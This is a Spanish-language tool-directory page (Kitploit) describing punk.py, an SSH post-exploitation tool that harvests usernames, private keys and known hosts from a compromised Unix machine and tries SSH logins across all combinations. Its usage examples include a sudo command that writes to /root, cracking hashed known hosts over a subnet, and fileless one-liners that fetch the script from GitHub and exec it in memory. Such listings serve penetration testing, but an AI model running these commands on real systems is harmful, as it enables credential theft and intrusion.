Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
punk.py — herramienta 1337 de post-explotación SSH para Unix | Kitploit
Herramientas/GitHubGitHub/r3vn/punk.py
Post-ExplotaciónPruebas de Penetración
GitHubr3vn/punk.py

punk.py

herramienta 1337 de post-explotación SSH para Unix

Ver Repositorio
14229hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

punk.py

Herramienta 1337 de post-explotación SSH en Unix

cómo funciona

punk.py es una herramienta de post-explotación diseñada para ayudar en el pivoteo de redes desde una caja Unix comprometida. Recolecta nombres de usuario, claves SSH y hosts conocidos de un sistema Unix, y luego intenta conectarse vía SSH a todas las combinaciones encontradas. punk.py está escrito para funcionar tanto en los intérpretes estándar de Python 2 como de Python 3.

Captura de pantalla

Captura de pantalla de 2018-12-11 14-01-15

ejemplos

Ejecución estándar:

root@kitploit:~
 ~$ ./punk.py

Omitir comprobaciones de passwd y usar una ruta de home personalizada:

root@kitploit:~
 ~$ ./punk.py --no-passwd --home /home/ldapusers/

Ejecutar comandos con sudo:

root@kitploit:~
 ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"

Descifrando hosts conocidos con hash SSH:

root@kitploit:~
 ~$ ./punk.py --crack 192.168.0.0/24

Línea única sin archivos en Python2 (con el parámetro --no-passwd):

root@kitploit:~
 ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

Línea única sin archivos en Python3:

root@kitploit:~
 ~$ python3 -c "import requests;exec(requests.get('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').text)"

TODO

  • Mejorar la búsqueda de claves privadas, incluyendo claves DSA
  • Recursividad
  • Fuerza bruta de claves SSH con contraseña
Descargar herramienta